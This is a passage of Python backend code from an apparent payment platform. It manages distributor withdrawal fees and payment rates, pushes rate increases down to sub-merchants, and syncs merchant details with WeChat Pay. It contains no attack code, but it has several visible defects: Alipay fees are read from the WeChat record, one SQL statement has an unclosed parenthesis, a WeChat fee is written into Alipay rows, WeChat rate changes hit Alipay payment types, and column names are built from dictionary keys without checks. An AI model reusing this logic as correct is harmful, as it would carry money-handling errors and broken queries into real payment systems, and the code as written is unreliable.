{\"ali_draw_fee\": 9100, \"wx_draw_rate\": 190, \"wx_draw_fee\": 1900, \"ali_draw_rate\": 910},\n # {\"wx\": 10, '\"alipay\": 20}\n # 考虑老的wx和alipay\n # wx = role.get('wx')\n # alipay = role.get('alipay')\n # 手续费\n wx_draw_fee = role.get('wx') if role.get('wx') else role.get('wx_draw_fee')\n ali_draw_fee = role.get('alipay') if role.get('alipay') else role.get('ali_draw_fee')\n # 垫资费\n wx_draw_rate = role.get('wx_draw_rate')\n ali_draw_rate = role.get('ali_draw_rate')\n\n select_query = \"\"\"select wx, alipay from d0_withdraw_fee where role=%s and role_type='dt'\"\"\"\n new_draw = \"\"\"select withdraw_rate, withdraw_fee from dt_payment where dt_id=%s and uline_payment_code like %s\"\"\"\n sql_wx_draw = self.db.selectSQL(new_draw, (self.dt_id, 'WX%'), fetchone=True, use_dict=True)\n sql_ali_draw = self.db.selectSQL(new_draw, (self.dt_id, 'ALI%'), fetchone=True, use_dict=True)\n\n # select_mch = \"\"\"\n # select d0_withdraw_fee.wx, d0_withdraw_fee.alipay, mch_inlet_info.mch_id\n # from d0_withdraw_fee inner join mch_inlet_info on mch_inlet_info.mch_id = d0_withdraw_fee.role\n # where mch_inlet_info.dt_id = %s and d0_withdraw_fee.role_type='mch'\n # and (d0_withdraw_fee.wx < %s or d0_withdraw_fee.alipay < %s)\n # \"\"\"\n\n ret = self.db.selectSQL(select_query, (self.dt_id,), fetchone=True, use_dict=True)\n # ret_mchs = self.db.selectSQL(select_mch, (self.dt_id, wx, alipay), fetchone=False)\n withdraw_cut_info = {}\n # 如果没有ret是None\n if ret:\n if sql_wx_draw and sql_wx_draw.get('withdraw_fee'):\n ret['wx'] = sql_wx_draw.get('withdraw_fee')\n if sql_ali_draw and sql_ali_draw.get('withdraw_fee'):\n ret['alipay'] = sql_wx_draw.get('withdraw_fee')\n # 需要立即更新的信息\n immediately_update_info = {}\n # 数据从无到有的信息\n # or ret['wx'] is not None and wx is None:\n if ret.get('wx') is None and wx_draw_fee is not None:\n immediately_update_info['wx'] = wx_draw_fee\n elif ret.get('wx') != wx_draw_fee:\n withdraw_cut_info['wx'] = wx_draw_fee\n\n # or ret['wx'] is not None and wx is None:\n if ret.get('alipay') is None and ali_draw_fee is not None:\n immediately_update_info['alipay'] = ali_draw_fee\n elif ret.get('alipay') != ali_draw_fee:\n withdraw_cut_info['alipay'] = ali_draw_fee\n\n if sql_wx_draw and sql_wx_draw.get('withdraw_rate') is None and wx_draw_rate is not None:\n immediately_update_info['wx_draw_rate'] = wx_draw_rate\n elif sql_wx_draw and sql_wx_draw.get('withdraw_rate') != wx_draw_rate:\n withdraw_cut_info['wx_draw_rate'] = wx_draw_rate\n\n if sql_ali_draw and sql_ali_draw.get('withdraw_rate') is None and ali_draw_rate is not None:\n immediately_update_info['ali_draw_rate'] = ali_draw_rate\n elif sql_ali_draw and sql_ali_draw.get('withdraw_rate') != ali_draw_rate:\n withdraw_cut_info['ali_draw_rate'] = ali_draw_rate\n\n # 没有打开日切,则立即生效\n if not self.open_daily_cut:\n query = \"\"\"update d0_withdraw_fee set wx=%s, alipay=%s where role=%s and role_type = %s\"\"\"\n self.db.executeSQL(query, (wx_draw_fee, ali_draw_fee, self.dt_id, 'dt'))\n\n # 保存到dt_paymnt表中(有空再优化,心情烦躁)\n if wx_draw_fee:\n update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (wx_draw_fee, self.dt_id, 'WX%'))\n if ali_draw_fee:\n update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (ali_draw_fee, self.dt_id, 'ALI%'))\n if wx_draw_rate:\n update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (wx_draw_rate, self.dt_id, 'WX%'))\n if ali_draw_rate:\n update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (ali_draw_rate, self.dt_id, 'ALI%'))\n\n # 判断手续费和垫资费是否有高于下级商户\n if sql_wx_draw and sql_wx_draw.get('withdraw_fee'):\n # 调高微信手续费\n if wx_draw_fee and wx_draw_fee > sql_wx_draw.get('withdraw_fee'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_fee < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (1,2,3,4,5);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (wx_draw_fee, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_fee=%s where mch_id in %s\n and payment_type in (1,2,3,4,5);\"\"\", (wx_draw_fee, tuple_mch_ids))\n\n if sql_wx_draw and sql_wx_draw.get('withdraw_rate'):\n # 调高微信手续费\n if wx_draw_rate and wx_draw_rate > sql_wx_draw.get('withdraw_rate'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_rate < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (1,2,3,4,5);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (wx_draw_rate, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_rate=%s where mch_id in %s\n and payment_type in (1,2,3,4,5);\"\"\", (wx_draw_rate, tuple_mch_ids))\n\n if sql_ali_draw and sql_ali_draw.get('withdraw_fee'):\n # 调高微信手续费\n if ali_draw_fee and ali_draw_fee > sql_ali_draw.get('withdraw_fee'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_fee < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (7,8,9);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (ali_draw_fee, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_fee=%s where mch_id in %s\n and payment_type in (7,8,9);\"\"\", (ali_draw_fee, tuple_mch_ids))\n\n if sql_ali_draw and sql_ali_draw.get('withdraw_rate'):\n # 调高微信手续费\n if ali_draw_rate and ali_draw_rate > sql_ali_draw.get('withdraw_rate'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_rate < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (7,8,9);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (ali_draw_rate, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_rate=%s where mch_id in %s\n and payment_type in (7,8,9);\"\"\", (ali_draw_rate, tuple_mch_ids))\n\n # 如果打开了日切,并且有立即生效的数据,则更新改数据\n elif immediately_update_info and self.open_daily_cut:\n update_infos = []\n params = list()\n for key in immediately_update_info:\n if key in ['wx', 'alipay']:\n update_infos.append(\"{}=%s\".format(key))\n params.append(immediately_update_info[key])\n params.extend([self.dt_id, 'dt'])\n if update_infos:\n update_sql = \"\"\"update d0_withdraw_fee set {} where role=%s and role_type=%s\"\"\".format(\n ','.join(update_infos))\n self.db.executeSQL(update_sql, tuple(params))\n\n # 需要立即更新的数据保存到dt_paymnet表中\n if immediately_update_info.get('wx'):\n update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (wx_draw_fee, self.dt_id, 'WX%'))\n # 判断是否有商户低于渠道商成本\n if sql_wx_draw.get('withdraw_fee') and immediately_update_info.get('wx') > sql_wx_draw.get('withdraw_fee'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_fee < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (1,2,3,4,5);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (wx_draw_fee, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_fee=%s where mch_id in %s\n and payment_type in (1,2,3,4,5);\"\"\", (wx_draw_fee, tuple_mch_ids))\n\n if immediately_update_info.get('alipay'):\n update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (wx_draw_fee, self.dt_id, 'ALI%'))\n\n # 判断是否有商户低于渠道商成本\n if sql_ali_draw.get('withdraw_fee') and immediately_update_info.get('alipay') > sql_ali_draw.get('withdraw_fee'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_fee < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (7,8,9);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (ali_draw_fee, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_fee=%s where mch_id in %s\n and payment_type in (7,8,9;\"\"\", (immediately_update_info.get('alipay'), tuple_mch_ids))\n\n if immediately_update_info.get('wx_draw_rate'):\n update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (wx_draw_rate, self.dt_id, 'WX%'))\n\n if sql_wx_draw.get('withdraw_rate') and immediately_update_info.get('wx_draw_rate') > sql_wx_draw.get('withdraw_rate'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_rate < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (7,8,9);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (wx_draw_rate, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_rate=%s where mch_id in %s\n and payment_type in (7,8,9);\"\"\", (wx_draw_rate, tuple_mch_ids))\n\n if immediately_update_info.get('ali_draw_rate'):\n update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (ali_draw_rate, self.dt_id, 'ALI%'))\n\n if sql_ali_draw.get('withdraw_rate') and immediately_update_info.get('ali_draw_rate') > sql_ali_draw.get('withdraw_rate'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_rate < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (7,8,9);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (ali_draw_rate, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_rate=%s where mch_id in %s\n and payment_type in (7,8,9);\"\"\", (ali_draw_rate, tuple_mch_ids))\n\n else:\n query = \"\"\"insert into d0_withdraw_fee(role, role_type, wx, alipay) values(%s,%s,%s,%s)\"\"\"\n self.db.executeSQL(query, (self.dt_id, 'dt', wx_draw_fee, ali_draw_fee))\n\n # 保存到dt_paymnt表中(有空再优化,心情烦躁)\n if wx_draw_fee:\n update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (wx_draw_fee, self.dt_id, 'WX%'))\n if ali_draw_fee:\n update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (ali_draw_fee, self.dt_id, 'ALI%'))\n if wx_draw_rate:\n update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (wx_draw_rate, self.dt_id, 'WX%'))\n if ali_draw_rate:\n update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (ali_draw_rate, self.dt_id, 'ALI%'))\n\n if not self.open_daily_cut:\n sql = \"\"\"update d0_withdraw_fee set {0}=%s where role_type='mch' and role in (\n select mch_inlet_info.mch_id\n from d0_withdraw_fee as df1 inner join mch_inlet_info on mch_inlet_info.mch_id = df1.role\n where mch_inlet_info.dt_id=%s and df1.role_type='mch'\n and df1.{0}<%s and df1.{0} NOTNULL\n )\"\"\"\n ali_sql = sql.format('alipay')\n self.db.executeSQL(ali_sql, (ali_draw_fee, self.dt_id, ali_draw_fee))\n wx_sql = sql.format('wx')\n self.db.executeSQL(wx_sql, (wx_draw_fee, self.dt_id, wx_draw_fee))\n\n @gen.coroutine\n def auth_password(self, password):\n valid = False\n selSql = \"select password from dt_user where dt_id=%s\"\n db_ret = self.db.selectSQL(selSql, (self.dt_id,))\n if db_ret:\n valid = yield common.bcrypt_pwd(password, db_ret[0])\n raise gen.Return(valid)\n\n def update_dt_inlet_info(self, change_inlet_info):\n sql = \"\"\"update dt_inlet_info set \"\"\"\n update_colums = []\n params_values = []\n for key in change_inlet_info:\n update_colums.append(\"\"\"{}=%s\"\"\".format(key))\n params_values.append(change_inlet_info[key])\n sql = sql + ','.join(update_colums)\n where_str = \" where dt_id=%s;\"\n sql = sql + where_str\n params_values.append(self.dt_id)\n self.db.executeSQL(sql, tuple(params_values))\n\n if 'dt_name' in change_inlet_info:\n sql = \"\"\"UPDATE dt_user SET dt_name=%s WHERE dt_id=%s;\"\"\"\n self.db.executeSQL(sql, (change_inlet_info['dt_name'], self.dt_id))\n\n def update_dt_active_status(self):\n sql = \"\"\"select count(*) as active_counts from dt_payment where activated_status=2 and dt_id=%s;\"\"\"\n result = self.db.selectSQL(sql, (self.dt_id,))\n activeed_counts = result[0]\n activated_status = 2 if activeed_counts >= 1 else 1\n sql = \"\"\"update dt_inlet_info set activated_status=%s where dt_id = %s;\"\"\"\n self.db.executeSQL(sql, (activated_status, self.dt_id))\n\n @gen.coroutine\n def update_dt_payments(self, payments):\n payment_cut_info = {}\n changed_payments = dict()\n if isinstance(payments, list):\n for each_payment in payments:\n changed_payments[each_payment[0]] = {'pay_type': each_payment[0],\n 'pay_rate': each_payment[1], 'pre_status': each_payment[2]}\n else:\n changed_payments = payments\n\n for pay_type in changed_payments:\n payment_info = changed_payments[pay_type]\n payment_type = payment_info['pay_type']\n payment_rate = payment_info['pay_rate']\n exist_status = payment_info['pre_status']\n action_type = payment_info.get('action_type', 2)\n\n # 将老的payment_type转换成uline_payment_code\n if payment_type.isdigit():\n # if isinstance(payment_type, int):\n uline_payment_code = old_payment_relations.get(payment_type)\n else:\n uline_payment_code = payment_type\n payment_type = new_payment_relations.get(uline_payment_code)\n\n # 如果是更新\n if action_type == 2:\n activated_status = 1\n dt_id = self.dt_id\n\n # 查询支付方式的原有费率,如果有且等于更新的费率,则需要还原为原有的激活状态\n sql = \"\"\"select activated_status, payment_rate from dt_payment where dt_id=%s and payment_type=%s;\"\"\"\n result = self.db.selectSQL(sql, (self.dt_id, payment_type))\n if result:\n exist_rate = result[1]\n # 如果与原有的费率一致,且原有状态为未激活或已激活,则保持原有状态\n if exist_rate and exist_rate == payment_rate and exist_status == 2:\n activated_status = exist_status\n to_daily_cut = False\n # 更新支付费率的信息\n\n if self.open_daily_cut:\n payment_cut_info[int(payment_type)] = {\n 'pre_payment_rate': exist_rate,\n 'pre_payment_status': exist_status,\n 'update_payment_rate': payment_rate,\n 'payment_type': int(payment_type),\n 'action_type': action_type\n }\n else:\n self.db.executeSQL(\"\"\"\n update dt_payment set payment_type=%s, payment_rate=%s, activated_status=%s, settle_rate=%s\n where dt_id=%s\n and payment_type=%s;\n \"\"\", (payment_type, payment_rate, activated_status, payment_rate, dt_id, payment_type))\n\n # 判断修改后的费率是否大于本来的费率\n if payment_rate > exist_rate:\n # 查询判断是否渠道商修改后的费率大于旗下商户\n query = \"\"\"select mch_payment.mch_id from mch_payment inner join mch_inlet_info on\n mch_inlet_info.mch_id = mch_payment.mch_id inner join dt_payment on\n mch_inlet_info.dt_id = dt_payment.dt_id and dt_payment.payment_type = mch_payment.payment_type\n where mch_payment.payment_rate < %s and dt_payment.dt_id=%s and\n dt_payment.payment_type=%s;\"\"\"\n mch_ids = self.db.selectSQL(\n query, (payment_rate, self.dt_id, payment_type), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set payment_rate=%s, settle_rate=%s where mch_id in %s\n and payment_type=%s;\"\"\", (payment_rate, payment_rate, tuple_mch_ids, payment_type))\n\n query = \"\"\"select dp_lower.dt_id from dt_payment as dp_lower inner join dt_inlet_info on\n dt_inlet_info.dt_id=dp_lower.dt_id inner join dt_payment dp_higher on\n dt_inlet_info.parent_id=dp_higher.dt_id and dp_lower.payment_type=dp_higher.payment_type\n where dp_lower.payment_rate<%s and dp_higher.dt_id=%s and dp_higher.payment_type=%s\"\"\"\n chain_ids = self.db.selectSQL(\n query, (payment_rate, self.dt_id, payment_type), fetchone=False)\n tuple_chain_ids = tuple([chain_id[0] for chain_id in chain_ids])\n if tuple_chain_ids:\n sql = \"\"\"update dt_payment set payment_rate=%s, settle_rate=%s where dt_id in %s and\n payment_type=%s;\"\"\"\n self.db.executeSQL(sql, (payment_rate, payment_rate,\n tuple_chain_ids, payment_type))\n # 新增支付方式\n elif action_type == 1:\n # 添加\n tmp_str = translate_payment_type.get(payment_type)\n uline_payment_id, uline_settle_id, trade_type,\\\n thirdparty_mch_id, uline_payment_code = tmp_str.split('|')\n\n sql = \"\"\"INSERT INTO dt_payment(dt_id, settle_rate, uline_payment_id, uline_payment_code,\n uline_settle_id, trade_type,\n payment_type, payment_rate, activated_status,\n create_at, update_at)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\"\"\n self.db.executeSQL(sql, (self.dt_id, payment_rate, uline_payment_id, uline_payment_code,\n uline_settle_id, trade_type,\n payment_type, payment_rate, 1, self.create_at, self.create_at))\n\n # sql = \"\"\"INSERT INTO activated_dt_info (dt_id, payment_type, comment, activated_user, activated_status, create_at)\n # values(%s, %s,%s, %s, %s, %s)\"\"\"\n # self.db.executeSQL(sql, (\n # self.dt_id, payment_type, constants.ACTIVATED_STATUS['2'],\n # self.bk_email, 2, self.create_at))\n\n # 删除支付方式\n elif action_type == 3:\n sql = \"\"\"DELETE FROM dt_payment WHERE dt_id=%s and payment_type=%s;\"\"\"\n self.db.executeSQL(sql, (self.dt_id, payment_type))\n\n # 删除旗下商户、门店的支付方式\n query = \"\"\"update mch_payment set activated_status=1 where payment_type=%s and mch_payment.mch_id in\n (select mch_id from mch_inlet_info where dt_id=%s);\"\"\"\n self.db.executeSQL(query, (payment_type, self.dt_id))\n # 删除旗下连锁商户的支付方式\n query = \"\"\"update dt_payment set activated_status=1 where payment_type=%s and dt_payment.dt_id in\n (select dt_id from dt_inlet_info where parent_id=%s);\"\"\"\n self.db.executeSQL(query, (payment_type, self.dt_id))\n\n raise gen.Return(payment_cut_info)\n\n @gen.coroutine\n def get_dt_wx_reg_payment(self):\n query = \"\"\"select id from dt_payment where dt_id=%s and payment_type in (1,2,3);\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def get_dt_wx_app_payment(self):\n query = \"\"\"select id from dt_payment where dt_id=%s and payment_type=4;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def update_dt_user(self):\n query = \"\"\"\n update dt_user set\n status=%s,\n update_at=%s where dt_id=%s\n \"\"\"\n self.db.executeSQL(query, (self.status, self.update_at, self.dt_id))\n\n @gen.coroutine\n def auth_dt_inlet(self):\n query = \"\"\"update dt_inlet_info set\n auth_status=%s,\n update_at=%s where dt_id=%s\"\"\"\n self.db.executeSQL(query, (self.status, self.update_at, self.dt_id))\n\n @gen.coroutine\n def add_auth_inlet_info(self):\n auth_user = yield self.get_bk_email()\n query = \"\"\"\n insert into auth_dt_info (\n dt_id,\n comment,\n auth_user,\n auth_status,\n create_at)\n values (%s, %s, %s, %s, %s);\"\"\"\n self.db.executeSQL(\n query,\n (\n self.dt_id,\n AUTH_STATUS[str(self.status)],\n auth_user,\n self.status,\n self.create_at\n )\n )\n\n @gen.coroutine\n def get_bk_email(self):\n employee_id = self.session[\"employee_id\"]\n employee = uline_session.query(Employee).filter(Employee.id == employee_id).one()\n user_profile = uline_session.query(UserProfile).filter(UserProfile.id == employee.user_id).one()\n email = user_profile.email\n raise gen.Return(email)\n # query = \"\"\"select email from bk_user where bk_id=%s\"\"\"\n # ret = self.db.selectSQL(query, (self.current_user,))\n # raise gen.Return(ret[0])\n\n @gen.coroutine\n def get_dt_user_wx_id(self):\n query = \"\"\"select\n wx_sub_mch_id,\n wx_app_sub_mch_id\n from dt_user\n where dt_id=%s\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def get_dt_inlet_info(self):\n query = \"\"\"select\n dt_name,\n contact,\n mobile,\n email,\n old_ind_code,\n wx_ind_code,\n service_phone,\n wx_channel_id,\n wx_app_channel_id,\n parent_id\n from\n dt_inlet_info\n where dt_id=%s;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def get_dt_wx_config(self):\n query = \"\"\"select rate from dt_user where dt_id=%s;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n if ret[0] == 1:\n raise gen.Return((WX_0_WX_MCH_ID, WX_0_WXPAY_KEY, WX_0_APPID))\n else:\n raise gen.Return((WX_MCH_ID, WXPAY_KEY, APPID))\n raise gen.Return(ret[0])\n\n @gen.coroutine\n def get_update_wx_sub_info(self):\n query = \"\"\"\n select dt_inlet_info.dt_id,\n dt_inlet_info.mobile,\n dt_user.wx_sub_mch_id,\n dt_inlet_info.service_phone\n from\n dt_inlet_info\n inner join dt_user on dt_user.dt_id=dt_inlet_info.dt_id\n where dt_inlet_info.dt_id=%s;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def create_wx_sub_dt_id(self, dt_inlet_info, channel_id, APPID, WX_MCH_ID, WXPAY_KEY, WX_PRIVATE_KEY, WX_PUB_KEY,\n WX_ROOT_CA):\n wx_business_no = dt_inlet_info[\n 5] if dt_inlet_info[5] else dt_inlet_info[4]\n query_args = {\n \"appid\": APPID,\n \"mch_id\": WX_MCH_ID,\n \"merchant_name\": dt_inlet_info[0],\n \"merchant_shortname\": dt_inlet_info[0],\n \"service_phone\": dt_inlet_info[6] if dt_inlet_info[6] else dt_inlet_info[2],\n 'contact': dt_inlet_info[1],\n \"contact_phone\": dt_inlet_info[2],\n \"contact_email\": dt_inlet_info[3],\n \"business\": wx_business_no,\n \"merchant_remark\": self.dt_id,\n 'channel_id': channel_id\n }\n result = yield create_wx_mch(query_args, WXPAY_KEY, WX_PRIVATE_KEY, WX_PUB_KEY, WX_ROOT_CA)\n if not result:\n result = dict(result_code='FAIL')\n raise gen.Return(result)\n\n @gen.coroutine\n def update_wx_sub_dt_id(\n self, dt_inlet_info, APPID, WX_MCH_ID, WXPAY_KEY,\n WX_PRIVATE_KEY, WX_PUB_KEY, WX_ROOT_CA):\n mchInletToWx = UpdateMerchantInletToWx(APPID, WX_MCH_ID, WXPAY_KEY)\n\n merchant_shorname = u'{}微信支付商户'.format(BANK_NAME)\n service_phone = dt_inlet_info[3] if dt_inlet_info[3] else dt_inlet_info[1]\n data = mchInletToWx.handle()(\n merchant_shortname=merchant_shorname,\n service_phone=service_phone,\n sub_mch_id=dt_inlet_info[2],\n )\n\n is_success = True\n # 当从微信获取的商户信息不同现有信息时,才进行修改\n if self.merchant_info_in_wx and ((self.merchant_info_in_wx['merchant_shortname'] != merchant_shorname) or (\n self.merchant_info_in_wx['service_phone'] != service_phone)):\n http_client = AsyncHTTPClient()\n response = yield http_client.fetch(\n \"https://api.mch.weixin.qq.com/secapi/mch/submchmanage?action=modify\",\n method='POST', body=data,\n client_key=WX_PRIVATE_KEY,\n client_cert=WX_PUB_KEY, ca_certs=WX_ROOT_CA\n )\n ret = xml_to_dict(response.body).get('root')\n log.detail.info(response.body)\n is_success = (ret.get('return_code', '') ==\n 'SUCCESS') if ret else False\n raise gen.Return(is_success)\n elif not self.merchant_info_in_wx:\n # 如果没有从微信获取有效信息 ,应该不会发生\n log.exception.info('update_wx_sub_dt_id no merchant_info from wx')\n raise gen.Return(False)\n else:\n # 如果有信息且与现有的有效\n raise gen.Return(True)\n\n @gen.coroutine\n def add_wx_sub_dt_id(self):\n query = \"\"\"update dt_user set wx_sub_mch_id=%s,\n update_at=%s where dt_id=%s\"\"\"\n self.db.executeSQL(\n query, (self.wx_sub_dt_id, self.update_at, self.dt_id))\n\n @gen.coroutine\n def add_wx_app_sub_dt_id(self):\n query = \"\"\"update dt_user set wx_app_sub_mch_id=%s,\n update_at=%s where dt_id=%s\"\"\"\n self.db.executeSQL(query, (self.wx_app_sub_dt_id,\n self.update_at, self.dt_id))\n\n @gen.coroutine\n def save_dt_inlet_to_wx(self, ret):\n query = \"\"\"\n insert into dt_inlet_to_wx_info (\n dt_id, return_code, return_msg,\n result_code, result_msg, create_at\n ) values (%s, %s, %s, %s, %s, %s);\"\"\"\n self.db.executeSQL(\n query,\n (\n self.dt_id,\n ret.get('result_code', 'FAIL'),\n ret.get('return_msg', 'FAIL'),\n ret.get('result_code', 'FAIL'),\n ret.get('result_msg', 'FAIL'),\n self.create_at\n )\n )\n\n @gen.coroutine\n def update_app_info2wx(self):\n \"\"\"更新app商户信息到微信\n :return:\n 更新到微信,微信返回的结果,一个dict\n \"\"\"\n # 获取更新相关信息\n dt_inlet_info = yield self.get_update_wx_app_sub_info()\n service_phone = dt_inlet_info[3] if dt_inlet_info[3] else dt_inlet_info[1]\n\n merchant_name = dt_inlet_info[4]\n merchant_shorname = u'{}微信支付商户'.format(BANK_NAME)\n search_info = {\n 'merchant_name': merchant_name,\n 'sub_mch_id': dt_inlet_info[2]\n }\n self.app_merchant_info_in_wx = yield self.get_mch_info_from_wx(search_info, WX_APP_APPID, WX_APP_MCH_ID,\n WXPAY_APP_KEY, WX_APP_PRIVATE_KEY,\n WX_APP_PUB_KEY, WX_ROOT_CA)\n\n is_success = True\n # 同步至微信\n # 当从微信获取的商户信息不同现有信息时,才进行修改\n if self.app_merchant_info_in_wx and (\n (self.app_merchant_info_in_wx['merchant_shortname'] != merchant_shorname) or (\n self.app_merchant_info_in_wx['service_phone'] != service_phone)):\n updateinfo = {\n 'short_name': merchant_shorname,\n 'service_phone': service_phone,\n 'wx_mch_id': dt_inlet_info[2]\n }\n result = yield self.update_mch_info2wx(updateinfo, WX_APP_APPID, WX_APP_MCH_ID, WXPAY_APP_KEY,\n WX_APP_PRIVATE_KEY, WX_APP_PUB_KEY, WX_ROOT_CA)\n\n log.exception.info('update wx app mch info result:{}'.format(\n json.dumps(result, ensure_ascii=False)))\n is_success = result.get(\n 'return_code', '') == 'SUCCESS' if result else False\n if not is_success:\n log.exception.info('update wx app mch failed,result_code : {}'.format(\n result.get('return_code', '')))\n elif not self.app_merchant_info_in_wx:\n # 微信中没有商户信息,添加日志,修改失败\n log.exception.info('update_app_info2wx no merchant info from wx, app_sub_id:{0}, merchant name:{1}'.format(\n dt_inlet_info[2], merchant_shorname))\n is_success = False\n else:\n # 没有变化,表示修改成功\n is_success = True\n raise gen.Return(is_success)\n\n @gen.coroutine\n def get_update_wx_app_sub_info(self):\n query = \"\"\"\n select dt_inlet_info.dt_id,\n dt_inlet_info.mobile,\n dt_user.wx_app_sub_mch_id,\n dt_inlet_info.service_phone,\n dt_inlet_info.dt_name\n from dt_inlet_info\n inner join dt_user on dt_user.dt_id=dt_inlet_info.dt_id\n where dt_inlet_info.dt_id=%s;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def add_fail_auth_inlet_info(self, show_comment):\n auth_user = yield self.get_bk_email()\n query = \"\"\"\n insert into auth_dt_info (\n dt_id,\n comment,\n auth_user,\n auth_status,\n create_at)\n values (%s, %s, %s, %s, %s);\"\"\"\n self.db.executeSQL(\n query,\n (\n self.dt_id,\n show_comment,\n auth_user,\n self.status,\n self.create_at\n )\n )\n\n def latest_status(self, cursor):\n query = \"\"\"\n SELECT auth_status, auth_user\n from auth_dt_info where dt_id = %s\n order by create_at desc\n LIMIT 1;\"\"\"\n cursor.execute(query, (self.dt_id,))\n ret = cursor.fetchone()\n return ret\n\n def auth_user_email(self, bk_id):\n selSql = \"\"\"select email from bk_user where bk_id=%s\"\"\"\n db_ret = self.db.selectSQL(selSql, (bk_id,))\n if db_ret:\n return db_ret[0]\n\n def get_chain_parent_info(self, parent_id):\n query = \"\"\"SELECT wx_channel_id, wx_app_channel_id FROM dt_inlet_info where dt_id=%s\"\"\"\n result = self.db.selectSQL(query, (parent_id,))\n return result\n\n def has_authed(self):\n sql = \"\"\"select * from auth_dt_info where dt_id=%s and auth_status=2\"\"\"\n result = self.db.selectSQL(sql, (self.dt_id,), fetchone=True)\n return bool(result)\n\n def add_daily_cut_record(self, cut_record):\n sql = \"\"\"insert into daily_cut_record(role_id, role_type, record_json, status) values(%s,%s,%s,1)\"\"\"\n 